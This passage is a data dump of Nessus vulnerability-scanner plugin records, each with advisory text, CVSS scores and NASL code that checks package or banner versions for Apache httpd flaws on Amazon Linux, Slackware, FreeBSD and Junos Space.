get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.22-1.23.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:11:58", "description": "According to its banner, the version of Apache 2.0.x running on the remote host is prior to 2.0.65. It is, therefore, affected by several vulnerabilities :\n\n - A flaw exists in the byte-range filter, making it vulnerable to denial of service. (CVE-2011-3192)\n\n - A flaw exists in 'mod_proxy' where it doesn't properly interact with 'RewriteRule' and 'ProxyPassMatch' in reverse proxy configurations. (CVE-2011-3368)\n\n - A privilege escalation vulnerability exists relating to a heap-based buffer overflow in 'ap_pregsub' function in 'mod_setenvif' module via .htaccess file.\n (CVE-2011-3607)\n\n - A local security bypass vulnerability exists within scoreboard shared memory that may allow the child process to cause the parent process to crash.\n (CVE-2012-0031)\n\n - A flaw exists within the status 400 code when no custom ErrorDocument is specified that could disclose 'httpOnly' cookies. (CVE-2012-0053)\n\n - A flaw exists in the 'RewriteLog' function where it fails to sanitize escape sequences written to log files, which could result in arbitrary command execution.\n (CVE-2013-1862)\n\nNote that the remote web server may not actually be affected by these vulnerabilities. Nessus did not try to determine whether the affected modules are in use nor did it test for the issues themselves.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"}, "published": "2013-07-16T00:00:00", "type": "nessus", "title": "Apache 2.0.x < 2.0.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2013-1862"], "modified": "2019-11-27T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_0_65.NASL", "href": "https://www.tenable.com/plugins/nessus/68914", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68914);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2011-3192\",\n \"CVE-2011-3368\",\n \"CVE-2011-3607\",\n \"CVE-2012-0031\",\n \"CVE-2012-0053\",\n \"CVE-2013-1862\"\n );\n script_bugtraq_id(\n 49303,\n 49957,\n 50494,\n 51407,\n 51706,\n 59826\n );\n script_xref(name:\"EDB-ID\", value:\"17696\");\n script_xref(name:\"EDB-ID\", value:\"17969\");\n script_xref(name:\"EDB-ID\", value:\"18221\");\n script_xref(name:\"EDB-ID\", value:\"18442\");\n\n script_name(english:\"Apache 2.0.x < 2.0.65 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by several vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache 2.0.x running on the\nremote host is prior to 2.0.65. It is, therefore, affected by several\nvulnerabilities :\n\n - A flaw exists in the byte-range filter, making it\n vulnerable to denial of service. (CVE-2011-3192)\n\n - A flaw exists in 'mod_proxy' where it doesn't properly\n interact with 'RewriteRule' and 'ProxyPassMatch'\n in reverse proxy configurations. (CVE-2011-3368)\n\n - A privilege escalation vulnerability exists relating to\n a heap-based buffer overflow in 'ap_pregsub' function in\n 'mod_setenvif' module via .htaccess file.\n (CVE-2011-3607)\n\n - A local security bypass vulnerability exists within\n scoreboard shared memory that may allow the child\n process to cause the parent process to crash.\n (CVE-2012-0031)\n\n - A flaw exists within the status 400 code when no custom\n ErrorDocument is specified that could disclose\n 'httpOnly' cookies. (CVE-2012-0053)\n\n - A flaw exists in the 'RewriteLog' function where it\n fails to sanitize escape sequences written to log files,\n which could result in arbitrary command execution.\n (CVE-2013-1862)\n\nNote that the remote web server may not actually be affected by these\nvulnerabilities. Nessus did not try to determine whether the affected\nmodules are in use nor did it test for the issues themselves.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.0.65\");\n # https://web.archive.org/web/20130801230537/http://httpd.apache.org/security/vulnerabilities_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?366bbb5a\");\n # http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3C20130710124920.2b8793ed.wrowe@rowe-clan.net%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c309d2dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.0.65 or later. Alternatively, ensure that\nthe affected modules are not in use.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1862\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache web server\");\n\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nfixed_ver = '2.0.65';\nif (version =~ '^2(\\\\.0)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\nif (version !~ \"^\\d+(\\.\\d+)*$\") exit(1, \"The version of Apache listening on port \" + port + \" - \" + version + \" - is non-numeric and, therefore, cannot be used to make a determination.\");\nif (version =~ '^2\\\\.0' && ver_compare(ver:version, fix:fixed_ver) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.65\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, version);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:01", "description": "New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix security issues. The apr-util package has also been updated to the latest version.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-13T00:00:00", "type": "nessus", "title": "Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : httpd (SSA:2012-041-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:apr-util", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37"], "id": "SLACKWARE_SSA_2012-041-01.NASL", "href": "https://www.tenable.com/plugins/nessus/57892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2012-041-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57892);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"SSA\", value:\"2012-041-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : httpd (SSA:2012-041-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 12.0, 12.1, 12.2,\n13.0, 13.1, 13.37, and -current to fix security issues. The apr-util\npackage has also been updated to the latest version.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd8f1ebc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apr-util and / or httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apr-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\nif (slackware_check(osver:\"12.0\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\nif (slackware_check(osver:\"12.1\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\nif (slackware_check(osver:\"12.2\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"apr-util\", pkgver:\"1.4.1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.22\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:02", "description": "CVE MITRE reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker.\n\nInteger overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.\n\nAn additional exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker.\n\nA flaw was found in mod_log_config. If the '%{cookiename}C' log format string is in use, a remote attacker could send a specific cookie causing a crash. This crash would only be a denial of service if using a threaded MPM.\n\nA flaw was found in the handling of the scoreboard. An unprivileged child process could cause the parent process to crash at shutdown rather than terminate cleanly.\n\nA flaw was found in the default error response for status code 400.\nThis flaw could be used by an attacker to expose 'httpOnly' cookies when no custom ErrorDocument is specified.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-02T00:00:00", "type": "nessus", "title": "FreeBSD : apache -- multiple vulnerabilities (4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4B7DBFAB4C6B11E1BC160023AE8E59F0.NASL", "href": "https://www.tenable.com/plugins/nessus/57786", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57786);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"FreeBSD : apache -- multiple vulnerabilities (4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE MITRE reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In\ncertain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nAn additional exposure was found when using mod_proxy in reverse proxy\nmode. In certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n\nA flaw was found in mod_log_config. If the '%{cookiename}C' log format\nstring is in use, a remote attacker could send a specific cookie\ncausing a crash. This crash would only be a denial of service if using\na threaded MPM.\n\nA flaw was found in the handling of the scoreboard. An unprivileged\nchild process could cause the parent process to crash at shutdown\nrather than terminate cleanly.\n\nA flaw was found in the default error response for status code 400.\nThis flaw could be used by an attacker to expose 'httpOnly' cookies\nwhen no custom ErrorDocument is specified.\"\n );\n # https://vuxml.freebsd.org/freebsd/4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c313f58\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache>2.*<2.2.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:47:24", "description": "According to its self-reported version number, the remote Junos Space version is prior to 13.1R1.6. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple Vulnerabilities related to the included Apache HTTP server. (CVE-2011-3368, CVE-2011-4317, CVE-2012-0053)\n\n - A cross-site scripting flaw within the web interface that allows a remote attacker, with a specially crafted request, to access sensitive information.\n (CVE-2013-5095)\n\n - A flaw exists with the access control implementation that allows a remote attacker with read-only privileges to change the device's configuration. (CVE-2013-5096)\n\n - An information disclosure flaw exists that allows a remote attacker to obtain a list of users and their hashed passwords. (CVE-2013-5097)", "cvss3": {"score": null, "vector": null}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Juniper Junos Space 11.1x < 13.1R1.6 Multiple Vulnerabilities (JSA10585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0053", "CVE-2013-5095", "CVE-2013-5096", "CVE-2013-5097"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA10585.NASL", "href": "https://www.tenable.com/plugins/nessus/80192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\n \"CVE-2011-3368\",\n \"CVE-2011-4317\",\n \"CVE-2012-0053\",\n \"CVE-2013-5095\",\n \"CVE-2013-5096\",\n \"CVE-2013-5097\"\n );\n script_bugtraq_id(\n 49957,\n 50802,\n 51706,\n 61791,\n 61794,\n 61795\n );\n\n script_name(english:\"Juniper Junos Space 11.1x < 13.1R1.6 Multiple Vulnerabilities (JSA10585)\");\n script_summary(english:\"Checks the version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Junos Space\nversion is prior to 13.1R1.6. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Multiple Vulnerabilities related to the included Apache\n HTTP server. (CVE-2011-3368, CVE-2011-4317,\n CVE-2012-0053)\n\n - A cross-site scripting flaw within the web interface\n that allows a remote attacker, with a specially crafted\n request, to access sensitive information.\n (CVE-2013-5095)\n\n - A flaw exists with the access control implementation\n that allows a remote attacker with read-only privileges\n to change the device's configuration. (CVE-2013-5096)\n\n - An information disclosure flaw exists that allows a\n remote attacker to obtain a list of users and their\n hashed passwords. (CVE-2013-5097)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10585\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Junos Space 13.1R1.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", 